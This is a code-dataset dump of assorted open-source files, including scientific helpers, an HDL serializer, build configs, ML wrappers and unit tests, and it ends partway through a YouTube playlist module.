max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M)
---|---|---|---|---|
Alignment/APEEstimation/test/plottingTools/systematicErrors.py | ckamtsikis/cmssw | 852 | 12657552 | import numpy as np
import ROOT
DIR_BOTH = 0
DIR_UP = 1
DIR_DOWN = -1
NUM_SECTORS = 68
NUM_SECTORS_Y = 14
# systematics has:
# a dict with coordinate names "X", "Y" as keys
# - each value of these keys is a list/an array of systematic errors for each sector
# - so the list has the length of the number of sectors for that coordinate
# - these errors are added in quadrature
# direction, which can be DIR_DOWN, DIR_BOTH, or DIR_UP, depending on whether the error is applied only downwards, symmetrically, or only upwards
# isRelative, which is a flag telling whether the error is relative to the APE value or absolute
class SystematicErrors:
def __init__(self):
self.X = np.zeros(NUM_SECTORS)
self.Y = np.zeros(NUM_SECTORS)
        # is not made separately for X and Y. If this is wanted, make two separate objects
self.isRelative = np.zeros(NUM_SECTORS, dtype=int)
self.direction = np.empty(NUM_SECTORS, dtype=int)
        self.direction.fill(DIR_BOTH)  # just so it is clear that the default direction is symmetric
def __getitem__(self, key):
return getattr(self, key)
def getXFromList(self, X, startat=0):
for i,x in enumerate(X):
self.X[i+startat] = x
def getYFromList(self, Y, startat=0):
for i,y in enumerate(Y):
self.Y[i+startat] = y
# each line has the structure: xerr yerr isrel direction
def write(self, fileName):
with open(fileName, "w") as fi:
            for x, y, rel, direc in zip(self.X, self.Y, self.isRelative, self.direction):
                fi.write("{} {} {} {}\n".format(x, y, rel, direc))
def read(self, fileName):
with open(fileName, "r") as fi:
sector = 0
for line in fi:
x, y, rel, direc = line.rstrip().split(" ")
self.X[sector] = float(x)
self.Y[sector] = float(y)
self.isRelative[sector] = int(rel)
self.direction[sector] = int(direc)
sector += 1
return self
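# Usage sketch (file name and error values below are hypothetical, not taken from
# the APE workflow itself):
#   syst = SystematicErrors()
#   syst.getXFromList([0.001] * NUM_SECTORS)
#   syst.write("systematics.txt")
#   syst_read_back = SystematicErrors().read("systematics.txt")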
# difference between ape values in each sector
# returns a SystematicErrors object with values
def apeDifference(minuend, subtrahend):
fileA = ROOT.TFile(minuend, "READ")
fileB = ROOT.TFile(subtrahend, "READ")
apeTreeA_X = fileA.Get("iterTreeX")
apeTreeA_X.SetDirectory(0)
apeTreeB_X = fileB.Get("iterTreeX")
apeTreeB_X.SetDirectory(0)
apeTreeA_Y = fileA.Get("iterTreeY")
apeTreeA_Y.SetDirectory(0)
apeTreeB_Y = fileB.Get("iterTreeY")
apeTreeB_Y.SetDirectory(0)
fileA.Close()
fileB.Close()
# get to last iteration of each tree
apeTreeA_X.GetEntry(apeTreeA_X.GetEntries()-1)
apeTreeB_X.GetEntry(apeTreeB_X.GetEntries()-1)
apeTreeA_Y.GetEntry(apeTreeA_Y.GetEntries()-1)
apeTreeB_Y.GetEntry(apeTreeB_Y.GetEntries()-1)
difference = SystematicErrors()
isRel = 0
direc = 0
for sector in range(1, NUM_SECTORS+1):
name = "Ape_Sector_{}".format(sector)
diffX = abs(getattr(apeTreeA_X, name) - getattr(apeTreeB_X, name))
difference.X[sector-1] = diffX
if sector <= NUM_SECTORS_Y:
diffY = abs(getattr(apeTreeA_Y, name) - getattr(apeTreeB_Y, name))
difference.Y[sector-1] = diffY
        difference.isRelative[sector-1] = isRel
difference.direction[sector-1] = direc
return difference
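# Usage sketch (the two ROOT file names are placeholders for iterationApe files):
#   diff = apeDifference("workingArea_A/allData_iterationApe.root",
#                        "workingArea_B/allData_iterationApe.root")
#   diff.write("ape_difference.txt")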
# inFile is allData.root, not allData_iterationApe.root
# returns two arrays with values in x and y
def numberOfHits(inFileName):
inFile = ROOT.TFile(inFileName, "READ")
num_x = np.zeros(NUM_SECTORS, dtype=int)
num_y = np.zeros(NUM_SECTORS, dtype=int)
for sector in range(1, NUM_SECTORS+1):
xhist = inFile.Get("ApeEstimator1/Sector_{}/Results/h_ResX".format(sector))
num_x[sector-1] = xhist.GetEntries()
if sector <= NUM_SECTORS_Y:
yhist = inFile.Get("ApeEstimator1/Sector_{}/Results/h_ResY".format(sector))
num_y[sector-1] = yhist.GetEntries()
inFile.Close()
return num_x, num_y
def main():
pass
if __name__ == "__main__":
main()
|
hwt/serializer/verilog/serializer.py | ufo2011/hwt | 134 | 12657553 | from copy import copy
from typing import Optional, List
from hdlConvertorAst.hdlAst import HdlStmIf, HdlOp, \
HdlOpType, HdlValueId, HdlModuleDec, iHdlStatement
from hdlConvertorAst.hdlAst._defs import HdlIdDef
from hdlConvertorAst.hdlAst._expr import HdlTypeAuto
from hdlConvertorAst.hdlAst._statements import HdlStmProcess, HdlStmBlock, HdlStmAssign, \
HdlStmWait
from hdlConvertorAst.to.verilog.keywords import IEEE1800_2017_KEYWORDS
from hdlConvertorAst.translate.common.name_scope import LanguageKeyword, NameScope
from hdlConvertorAst.translate.verilog_to_basic_hdl_sim_model.utils import hdl_call
from hwt.hdl.portItem import HdlPortItem
from hwt.hdl.types.array import HArray
from hwt.hdl.types.defs import STR, INT, BOOL
from hwt.serializer.generic.to_hdl_ast import ToHdlAst
from hwt.serializer.verilog.context import SignalTypeSwap
from hwt.serializer.verilog.ops import ToHdlAstVerilog_ops
from hwt.serializer.verilog.statements import ToHdlAstVerilog_statements
from hwt.serializer.verilog.types import ToHdlAstVerilog_types
from hwt.serializer.verilog.utils import SIGNAL_TYPE, verilogTypeOfSig
from hwt.serializer.verilog.value import ToHdlAstVerilog_Value
class ToHdlAstVerilog(ToHdlAstVerilog_types,
ToHdlAstVerilog_Value, ToHdlAstVerilog_statements,
ToHdlAstVerilog_ops, ToHdlAst):
_keywords_dict = {kw: LanguageKeyword() for kw in IEEE1800_2017_KEYWORDS}
def __init__(self, name_scope: Optional[NameScope]=None):
ToHdlAst.__init__(self, name_scope=name_scope)
self.signalType = SIGNAL_TYPE.PORT_WIRE
def as_hdl_HdlModuleDef_variable(
self, v, types, hdl_types, hdl_variables,
processes, component_insts):
new_v = copy(v)
with SignalTypeSwap(self, verilogTypeOfSig(v.origin)):
t = v.type
# if type requires extra definition
if self.does_type_requires_extra_def(t, types):
_t = self.as_hdl_HdlType(t, declaration=True)
hdl_types.append(_t)
types.add(t)
new_v.type = self.as_hdl_HdlType(t, declaration=False)
            # this is an array variable which requires value initialization in an init
# process
if isinstance(t, HArray):
if v.value.vld_mask:
rom = v.origin
p = HdlStmProcess()
label = self.name_scope.checked_name(rom.name + "_rom_init", p)
p.labels.append(label)
p.body = HdlStmBlock()
body = p.body.body
for i, _v in enumerate(rom.def_val.val):
a = HdlStmAssign(self.as_hdl_int(int(_v)),
self.as_hdl(rom[i]))
a.is_blocking = True
body.append(a)
w = HdlStmWait()
w.val = [] # initial process
body.append(w)
processes.append(p)
# because we would not be able to initialize const/localparam variable later
new_v.is_const = False
new_v.value = None
elif new_v.value is not None:
if new_v.value.vld_mask:
new_v.value = self.as_hdl_Value(new_v.value)
else:
# 'x' is a default value no need to specify it extra
new_v.value = None
return new_v
def _static_assert_false(self, msg:str):
return hdl_call(HdlValueId("$error"), [f"%m {msg:s}"])
def _static_assert_symbol_eq(self, symbol_name:str, v):
i = HdlStmIf()
i.in_preproc = True
# [TODO] this actually requires SV>=2009
# generate
# if (p==x) begin
# $error("%m Generated only for this param value");
# end
# endgenerate
i.cond = HdlOp(HdlOpType.NE, [HdlValueId(symbol_name), v])
i.if_true = hdl_call(HdlValueId("$error"), [
"%m Generated only for this param value",
])
return i
def as_hdl_GenericItem(self, g: HdlIdDef):
with SignalTypeSwap(self, SIGNAL_TYPE.PORT_WIRE):
new_v = copy(g)
v = g.value
if v._dtype == STR or v._dtype == INT or v._dtype == BOOL:
t = HdlTypeAuto
else:
t = self.as_hdl_HdlType(v._dtype)
new_v.type = t
assert new_v.value is not None, g
new_v.value = self.as_hdl_Value(v)
return new_v
def as_hdl_HdlPortItem(self, pi: HdlPortItem):
with SignalTypeSwap(self, verilogTypeOfSig(pi)):
v = super(ToHdlAstVerilog, self).as_hdl_HdlPortItem(pi)
v.is_latched = self.signalType == SIGNAL_TYPE.PORT_REG
return v
def _as_hdl_HdlModuleDef_param_asserts(self, new_m: HdlModuleDec) -> List[iHdlStatement]:
return ToHdlAst._as_hdl_HdlModuleDef_param_asserts_real(self, new_m)
|
cwltool/singularity_utils.py | RenskeW/cwltool | 289 | 12657559 | <gh_stars>100-1000
"""Support for executing Docker containers using the Singularity 2.x engine."""
import os
import os.path
from subprocess import DEVNULL, PIPE, Popen, TimeoutExpired # nosec
from typing import Optional
_USERNS = None # type: Optional[bool]
def singularity_supports_userns() -> bool:
"""Confirm if the version of Singularity install supports the --userns flag."""
global _USERNS # pylint: disable=global-statement
if _USERNS is None:
try:
hello_image = os.path.join(os.path.dirname(__file__), "hello.simg")
result = Popen( # nosec
["singularity", "exec", "--userns", hello_image, "true"],
stderr=PIPE,
stdout=DEVNULL,
universal_newlines=True,
).communicate(timeout=60)[1]
_USERNS = (
"No valid /bin/sh" in result
or "/bin/sh doesn't exist in container" in result
or "executable file not found in" in result
)
except TimeoutExpired:
_USERNS = False
return _USERNS
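# Usage sketch: the result is cached in _USERNS, so repeated calls are cheap, e.g.
#   extra_flags = ["--userns"] if singularity_supports_userns() else []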
|
glance/async_/flows/plugins/__init__.py | daespinel/glance | 309 | 12657563 | # Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from stevedore import named
CONF = cfg.CONF
def get_import_plugins(**kwargs):
task_list = CONF.image_import_opts.image_import_plugins
extensions = named.NamedExtensionManager('glance.image_import.plugins',
names=task_list,
name_order=True,
invoke_on_load=True,
invoke_kwds=kwargs)
for extension in extensions.extensions:
yield extension.obj
|
deps/zxing/zxing.gyp | rwaldron/node-dv | 264 | 12657594 | <reponame>rwaldron/node-dv
{
'includes': [ '../common.gyp' ],
'targets': [
{
'target_name': 'libzxing',
'type': 'static_library',
'include_dirs': [
'core/src',
],
'sources': [
'core/src/bigint/BigInteger.cc',
'core/src/bigint/BigIntegerAlgorithms.cc',
'core/src/bigint/BigIntegerUtils.cc',
'core/src/bigint/BigUnsigned.cc',
'core/src/bigint/BigUnsignedInABase.cc',
'core/src/zxing/BarcodeFormat.cpp',
'core/src/zxing/Binarizer.cpp',
'core/src/zxing/BinaryBitmap.cpp',
'core/src/zxing/ChecksumException.cpp',
'core/src/zxing/DecodeHints.cpp',
'core/src/zxing/Exception.cpp',
'core/src/zxing/FormatException.cpp',
'core/src/zxing/InvertedLuminanceSource.cpp',
'core/src/zxing/LuminanceSource.cpp',
'core/src/zxing/MultiFormatReader.cpp',
'core/src/zxing/Reader.cpp',
'core/src/zxing/Result.cpp',
'core/src/zxing/ResultIO.cpp',
'core/src/zxing/ResultPoint.cpp',
'core/src/zxing/ResultPointCallback.cpp',
'core/src/zxing/aztec/AztecDetectorResult.cpp',
'core/src/zxing/aztec/AztecReader.cpp',
'core/src/zxing/aztec/decoder/1Decoder.cpp',
'core/src/zxing/aztec/detector/1Detector.cpp',
'core/src/zxing/common/BitArray.cpp',
'core/src/zxing/common/BitArrayIO.cpp',
'core/src/zxing/common/BitMatrix.cpp',
'core/src/zxing/common/BitSource.cpp',
'core/src/zxing/common/CharacterSetECI.cpp',
'core/src/zxing/common/DecoderResult.cpp',
'core/src/zxing/common/DetectorResult.cpp',
'core/src/zxing/common/GlobalHistogramBinarizer.cpp',
'core/src/zxing/common/GreyscaleLuminanceSource.cpp',
'core/src/zxing/common/GreyscaleRotatedLuminanceSource.cpp',
'core/src/zxing/common/GridSampler.cpp',
'core/src/zxing/common/HybridBinarizer.cpp',
'core/src/zxing/common/IllegalArgumentException.cpp',
'core/src/zxing/common/PerspectiveTransform.cpp',
'core/src/zxing/common/Str.cpp',
'core/src/zxing/common/StringUtils.cpp',
'core/src/zxing/common/detector/MonochromeRectangleDetector.cpp',
'core/src/zxing/common/detector/WhiteRectangleDetector.cpp',
'core/src/zxing/common/reedsolomon/GenericGF.cpp',
'core/src/zxing/common/reedsolomon/GenericGFPoly.cpp',
'core/src/zxing/common/reedsolomon/ReedSolomonDecoder.cpp',
'core/src/zxing/common/reedsolomon/ReedSolomonException.cpp',
'core/src/zxing/datamatrix/1Version.cpp',
'core/src/zxing/datamatrix/DataMatrixReader.cpp',
'core/src/zxing/datamatrix/decoder/1BitMatrixParser.cpp',
'core/src/zxing/datamatrix/decoder/1DataBlock.cpp',
'core/src/zxing/datamatrix/decoder/1DecodedBitStreamParser.cpp',
'core/src/zxing/datamatrix/decoder/2Decoder.cpp',
'core/src/zxing/datamatrix/detector/2Detector.cpp',
'core/src/zxing/datamatrix/detector/CornerPoint.cpp',
'core/src/zxing/datamatrix/detector/DetectorException.cpp',
'core/src/zxing/multi/ByQuadrantReader.cpp',
'core/src/zxing/multi/GenericMultipleBarcodeReader.cpp',
'core/src/zxing/multi/MultipleBarcodeReader.cpp',
'core/src/zxing/multi/qrcode/QRCodeMultiReader.cpp',
'core/src/zxing/multi/qrcode/detector/MultiDetector.cpp',
'core/src/zxing/multi/qrcode/detector/MultiFinderPatternFinder.cpp',
'core/src/zxing/oned/CodaBarReader.cpp',
'core/src/zxing/oned/Code128Reader.cpp',
'core/src/zxing/oned/Code39Reader.cpp',
'core/src/zxing/oned/Code93Reader.cpp',
'core/src/zxing/oned/EAN13Reader.cpp',
'core/src/zxing/oned/EAN8Reader.cpp',
'core/src/zxing/oned/ITFReader.cpp',
'core/src/zxing/oned/MultiFormatOneDReader.cpp',
'core/src/zxing/oned/MultiFormatUPCEANReader.cpp',
'core/src/zxing/oned/OneDReader.cpp',
'core/src/zxing/oned/OneDResultPoint.cpp',
'core/src/zxing/oned/UPCAReader.cpp',
'core/src/zxing/oned/UPCEANReader.cpp',
'core/src/zxing/oned/UPCEReader.cpp',
'core/src/zxing/pdf417/PDF417Reader.cpp',
'core/src/zxing/pdf417/decoder/2BitMatrixParser.cpp',
'core/src/zxing/pdf417/decoder/2DecodedBitStreamParser.cpp',
'core/src/zxing/pdf417/decoder/3Decoder.cpp',
'core/src/zxing/pdf417/decoder/ec/ErrorCorrection.cpp',
'core/src/zxing/pdf417/decoder/ec/ModulusGF.cpp',
'core/src/zxing/pdf417/decoder/ec/ModulusPoly.cpp',
'core/src/zxing/pdf417/detector/3Detector.cpp',
'core/src/zxing/pdf417/detector/LinesSampler.cpp',
'core/src/zxing/qrcode/2Version.cpp',
'core/src/zxing/qrcode/ErrorCorrectionLevel.cpp',
'core/src/zxing/qrcode/FormatInformation.cpp',
'core/src/zxing/qrcode/QRCodeReader.cpp',
'core/src/zxing/qrcode/decoder/2DataBlock.cpp',
'core/src/zxing/qrcode/decoder/3BitMatrixParser.cpp',
'core/src/zxing/qrcode/decoder/3DecodedBitStreamParser.cpp',
'core/src/zxing/qrcode/decoder/4Decoder.cpp',
'core/src/zxing/qrcode/decoder/DataMask.cpp',
'core/src/zxing/qrcode/decoder/Mode.cpp',
'core/src/zxing/qrcode/detector/4Detector.cpp',
'core/src/zxing/qrcode/detector/AlignmentPattern.cpp',
'core/src/zxing/qrcode/detector/AlignmentPatternFinder.cpp',
'core/src/zxing/qrcode/detector/FinderPattern.cpp',
'core/src/zxing/qrcode/detector/FinderPatternFinder.cpp',
'core/src/zxing/qrcode/detector/FinderPatternInfo.cpp',
],
'conditions': [
['OS=="win"',
{
'include_dirs': [
'core/src/win32/zxing/',
],
'sources': [
'core/src/win32/zxing/win_iconv.c',
],
}
],
],
},
]
}
|
users/urls.py | hrbhat/twissandra | 308 | 12657606 | <filename>users/urls.py
from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('users.views',
url('^login/$', 'login', name='login'),
url('^logout/$', 'logout', name='logout'),
url(r'^find-friends/$', 'find_friends', name='find_friends'),
url(r'^modify-friend/$', 'modify_friend', name='modify_friend'),
) |
pytorch_neat/aggregations.py | GPittia/PyTorch-NEAT | 486 | 12657641 | # Copyright (c) 2018 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import reduce
from operator import mul
def sum_aggregation(inputs):
return sum(inputs)
def prod_aggregation(inputs):
return reduce(mul, inputs, 1)
str_to_aggregation = {
'sum': sum_aggregation,
'prod': prod_aggregation,
}
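# Example sketch: aggregations can be looked up by name and applied to node inputs
#   agg = str_to_aggregation["prod"]
#   agg([2.0, 3.0, 4.0])  # -> 24.0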
|
Code/Chenglong/utils/xgb_utils.py | ChenglongChen/Kaggle_Homedepot | 465 | 12657671 | <filename>Code/Chenglong/utils/xgb_utils.py
# -*- coding: utf-8 -*-
"""
@author: <NAME> <<EMAIL>>
@brief: utils for XGBoost models
"""
import numpy as np
import matplotlib
matplotlib.use('Agg')
import xgboost as xgb
class XGBRegressor:
def __init__(self, booster='gbtree', base_score=0., colsample_bylevel=1.,
colsample_bytree=1., gamma=0., learning_rate=0.1, max_delta_step=0.,
max_depth=6, min_child_weight=1., missing=None, n_estimators=100,
nthread=1, objective='reg:linear', reg_alpha=1., reg_lambda=0.,
reg_lambda_bias=0., seed=0, silent=True, subsample=1.):
self.param = {
"objective": objective,
"booster": booster,
"eta": learning_rate,
"max_depth": max_depth,
"colsample_bylevel": colsample_bylevel,
"colsample_bytree": colsample_bytree,
"subsample": subsample,
"min_child_weight": min_child_weight,
"gamma": gamma,
"alpha": reg_alpha,
"lambda": reg_lambda,
"lambda_bias": reg_lambda_bias,
"seed": seed,
"silent": 1 if silent else 0,
"nthread": nthread,
"max_delta_step": max_delta_step,
}
self.missing = missing if missing is not None else np.nan
self.n_estimators = n_estimators
self.base_score = base_score
def __str__(self):
return self.__repr__()
def __repr__(self):
return ("%s(booster=\'%s\', base_score=%f, colsample_bylevel=%f, \n"
"colsample_bytree=%f, gamma=%f, learning_rate=%f, max_delta_step=%f, \n"
"max_depth=%d, min_child_weight=%f, missing=\'%s\', n_estimators=%d, \n"
"nthread=%d, objective=\'%s\', reg_alpha=%f, reg_lambda=%f, \n"
"reg_lambda_bias=%f, seed=%d, silent=%d, subsample=%f)" % (
self.__class__.__name__,
self.param["booster"],
self.base_score,
self.param["colsample_bylevel"],
self.param["colsample_bytree"],
self.param["gamma"],
self.param["eta"],
self.param["max_delta_step"],
self.param["max_depth"],
self.param["min_child_weight"],
str(self.missing),
self.n_estimators,
self.param["nthread"],
self.param["objective"],
self.param["alpha"],
self.param["lambda"],
self.param["lambda_bias"],
self.param["seed"],
self.param["silent"],
self.param["subsample"],
))
def fit(self, X, y, feature_names=None):
data = xgb.DMatrix(X, label=y, missing=self.missing, feature_names=feature_names)
data.set_base_margin(self.base_score*np.ones(X.shape[0]))
self.model = xgb.train(self.param, data, self.n_estimators)
return self
def predict(self, X, feature_names=None):
data = xgb.DMatrix(X, missing=self.missing, feature_names=feature_names)
data.set_base_margin(self.base_score*np.ones(X.shape[0]))
y_pred = self.model.predict(data)
return y_pred
def plot_importance(self):
ax = xgb.plot_importance(self.model)
self.save_topn_features()
return ax
def save_topn_features(self, fname="XGBRegressor_topn_features.txt", topn=-1):
ax = xgb.plot_importance(self.model)
yticklabels = ax.get_yticklabels()[::-1]
if topn == -1:
topn = len(yticklabels)
else:
topn = min(topn, len(yticklabels))
with open(fname, "w") as f:
for i in range(topn):
f.write("%s\n"%yticklabels[i].get_text())
class XGBClassifier:
def __init__(self, num_class=2, booster='gbtree', base_score=0., colsample_bylevel=1.,
colsample_bytree=1., gamma=0., learning_rate=0.1, max_delta_step=0.,
max_depth=6, min_child_weight=1., missing=None, n_estimators=100,
nthread=1, objective='multi:softprob', reg_alpha=1., reg_lambda=0.,
reg_lambda_bias=0., seed=0, silent=True, subsample=1.):
self.param = {
"objective": objective,
"booster": booster,
"eta": learning_rate,
"max_depth": max_depth,
"colsample_bylevel": colsample_bylevel,
"colsample_bytree": colsample_bytree,
"subsample": subsample,
"min_child_weight": min_child_weight,
"gamma": gamma,
"alpha": reg_alpha,
"lambda": reg_lambda,
"lambda_bias": reg_lambda_bias,
"seed": seed,
"silent": 1 if silent else 0,
"nthread": nthread,
"max_delta_step": max_delta_step,
"num_class": num_class,
}
self.missing = missing if missing is not None else np.nan
self.n_estimators = n_estimators
self.base_score = base_score
self.num_class = num_class
def __str__(self):
return self.__repr__()
def __repr__(self):
return ("%s(num_class=%d, booster=\'%s\', base_score=%f, colsample_bylevel=%f, \n"
"colsample_bytree=%f, gamma=%f, learning_rate=%f, max_delta_step=%f, \n"
"max_depth=%d, min_child_weight=%f, missing=\'%s\', n_estimators=%d, \n"
"nthread=%d, objective=\'%s\', reg_alpha=%f, reg_lambda=%f, \n"
"reg_lambda_bias=%f, seed=%d, silent=%d, subsample=%f)" % (
self.__class__.__name__,
self.num_class,
self.param["booster"],
self.base_score,
self.param["colsample_bylevel"],
self.param["colsample_bytree"],
self.param["gamma"],
self.param["eta"],
self.param["max_delta_step"],
self.param["max_depth"],
self.param["min_child_weight"],
str(self.missing),
self.n_estimators,
self.param["nthread"],
self.param["objective"],
self.param["alpha"],
self.param["lambda"],
self.param["lambda_bias"],
self.param["seed"],
self.param["silent"],
self.param["subsample"],
))
def fit(self, X, y, feature_names=None):
data = xgb.DMatrix(X, label=y, missing=self.missing, feature_names=feature_names)
data.set_base_margin(self.base_score*np.ones(X.shape[0] * self.num_class))
self.model = xgb.train(self.param, data, self.n_estimators)
return self
def predict_proba(self, X, feature_names=None):
data = xgb.DMatrix(X, missing=self.missing, feature_names=feature_names)
data.set_base_margin(self.base_score*np.ones(X.shape[0] * self.num_class))
proba = self.model.predict(data)
proba = proba.reshape(X.shape[0], self.num_class)
return proba
def predict(self, X, feature_names=None):
proba = self.predict_proba(X, feature_names=feature_names)
y_pred = np.argmax(proba, axis=1)
return y_pred
def plot_importance(self):
ax = xgb.plot_importance(self.model)
self.save_topn_features()
return ax
def save_topn_features(self, fname="XGBClassifier_topn_features.txt", topn=10):
ax = xgb.plot_importance(self.model)
yticklabels = ax.get_yticklabels()[::-1]
if topn == -1:
topn = len(yticklabels)
else:
topn = min(topn, len(yticklabels))
with open(fname, "w") as f:
for i in range(topn):
f.write("%s\n"%yticklabels[i].get_text())
class HomedepotXGBClassifier(XGBClassifier):
def __init__(self, booster='gbtree', base_score=0., colsample_bylevel=1.,
colsample_bytree=1., gamma=0., learning_rate=0.1, max_delta_step=0.,
max_depth=6, min_child_weight=1., missing=None, n_estimators=100,
nthread=1, objective='multi:softprob', reg_alpha=1., reg_lambda=0.,
reg_lambda_bias=0., seed=0, silent=True, subsample=1.):
super().__init__(num_class=1, booster=booster, base_score=base_score,
colsample_bylevel=colsample_bylevel, colsample_bytree=colsample_bytree,
gamma=gamma, learning_rate=learning_rate, max_delta_step=max_delta_step,
max_depth=max_depth, min_child_weight=min_child_weight, missing=missing,
n_estimators=n_estimators, nthread=nthread, objective=objective,
reg_alpha=reg_alpha, reg_lambda=reg_lambda, reg_lambda_bias=reg_lambda_bias,
seed=seed, silent=silent, subsample=subsample)
# encode relevance to label
self.encoder = {
1.00: 0,
1.25: 1,
1.33: 2,
1.50: 3,
1.67: 4,
1.75: 5,
2.00: 6,
2.25: 7,
2.33: 8,
2.50: 9,
2.67: 10,
2.75: 11,
3.00: 12,
}
# decode label to relevance
self.decoder = {v:k for k,v in self.encoder.items()}
self.num_class = len(self.encoder.keys())
self.param["num_class"] = self.num_class
def fit(self, X, y):
# encode relevance to label
y = list(map(self.encoder.get, y))
y = np.asarray(y, dtype=int)
super().fit(X, y)
return self
def predict(self, X):
y_pred = super().predict(X)
# decode label to relevance
y_pred = list(map(self.decoder.get, y_pred))
y_pred = np.asarray(y_pred, dtype=float)
return y_pred
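# Usage sketch (X_train/X_valid/y_train are hypothetical numpy arrays; y_train holds
# relevance scores such as 1.00, 2.33 or 3.00 that the encoder maps to class labels):
#   clf = HomedepotXGBClassifier(n_estimators=10, nthread=4)
#   clf.fit(X_train, y_train)
#   relevance_pred = clf.predict(X_valid)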
|
python/kwiver/vital/tests/test_sfm_constraints.py | mwoehlke-kitware/kwiver | 176 | 12657681 | """
ckwg +31
Copyright 2020 by Kitware, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither name of Kitware, Inc. nor the names of any contributors may be used
to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
==============================================================================
Tests for Python interface to vital::sfm_constraints
"""
import nose.tools as nt
import unittest
import numpy as np
from kwiver.vital.modules import modules
from kwiver.vital.types.metadata import *
from kwiver.vital.types.metadata_traits import *
from kwiver.vital.types import (
Metadata,
LocalGeoCS,
rotation,
RotationD,
RotationF,
SFMConstraints,
geodesy,
GeoPoint,
metadata_tags as mt,
SimpleMetadataMap,
)
modules.load_known_modules()
class TestSFMConstraints(unittest.TestCase):
@classmethod
def setUp(self):
self.meta_ = SimpleMetadataMap()
self.geo_ = LocalGeoCS()
self.small_tag = [
mt.tags.VITAL_META_UNKNOWN,
mt.tags.VITAL_META_UNIX_TIMESTAMP,
mt.tags.VITAL_META_SLANT_RANGE,
mt.tags.VITAL_META_MISSION_ID,
mt.tags.VITAL_META_VIDEO_KEY_FRAME,
]
self.loc1 = np.array([-73.759291, 42.849631])
self.crs_ll = geodesy.SRID.lat_lon_WGS84
self.geo_pt1_ = GeoPoint(self.loc1, self.crs_ll)
self.geo_.geo_origin = self.geo_pt1_
def test_init(self):
s = SFMConstraints()
SFMConstraints(s)
SFMConstraints(self.meta_, self.geo_)
def test_properties(self):
# modules.load_known_modules()
# metadata property
s = SFMConstraints(self.meta_, self.geo_)
get_meta = s.metadata
nt.assert_equal(get_meta.size(), 0)
m = SimpleMetadataMap()
s.metadata = m
nt.assert_equal(s.metadata.size(), 0)
# local_geo_property
ret_geo = s.local_geo_cs
np.testing.assert_array_almost_equal(ret_geo.geo_origin.location(self.crs_ll),
self.geo_pt1_.location())
s = SFMConstraints()
s.local_geo_cs = self.geo_
ret_geo = s.local_geo_cs
np.testing.assert_array_almost_equal(ret_geo.geo_origin.location(self.crs_ll),
self.geo_pt1_.location())
def test_get_camera_position_prior_local(self):
s = SFMConstraints(self.meta_, self.geo_)
nt.assert_false(s.get_camera_position_prior_local(0, np.array([0, 1, 3])))
nt.assert_false(s.get_camera_position_prior_local(0, RotationD([1, 2, 3, 4])))
def test_camera_position_priors(self):
s = SFMConstraints(self.meta_, self.geo_)
nt.assert_dict_equal(s.get_camera_position_priors(), {})
def test_image_properties(self):
s = SFMConstraints(self.meta_, self.geo_)
s.store_image_size(0, 1080, 720)
a,b = 0,0
founda, foundb = False, False
founda, a = s.get_image_width(0, a)
foundb, b = s.get_image_height(0, b)
nt.ok_(founda)
nt.ok_(foundb)
nt.assert_equal(a, 1080)
nt.assert_equal(b, 720)
found_focal = True
focal_len = 0.1
found_focal, focal_len = s.get_focal_length_prior(0, focal_len)
nt.assert_false(found_focal)
nt.assert_almost_equal(focal_len, 0.1)
|
BlenderAddon/data.py | gamekit-developers/gamekit | 241 | 12657687 | <reponame>gamekit-developers/gamekit<filename>BlenderAddon/data.py<gh_stars>100-1000
bl_addon_data = {
(2,5,3):
{
(0,0,601):
{
'binary_name':'ogrekit',
'api_compatibility':
{
31845:{
(0,0,601):(995,-1)
}
},
'binary_urls':
{
'linux-32':'<ogrekit 0.0.601 executable URL>',
'linux-64':'<ogrekit 0.0.601 executable URL>',
'windows-32':'<ogrekit 0.0.601 executable URL>',
'windows-64':'<ogrekit 0.0.601 executable URL>',
'osx-intel':'<ogrekit 0.0.601 executable URL>',
'osx-ppc':'<ogrekit 0.0.601 executable URL>'
}
}
}
} |
playx/playlist/youtube.py | Saul-Dickson/playx | 221 | 12657688 | <reponame>Saul-Dickson/playx<filename>playx/playlist/youtube.py
"""Youtube playlist related functions and classes
defined.
"""
import json
import requests
from bs4 import BeautifulSoup
import re
from playx.utility import exe
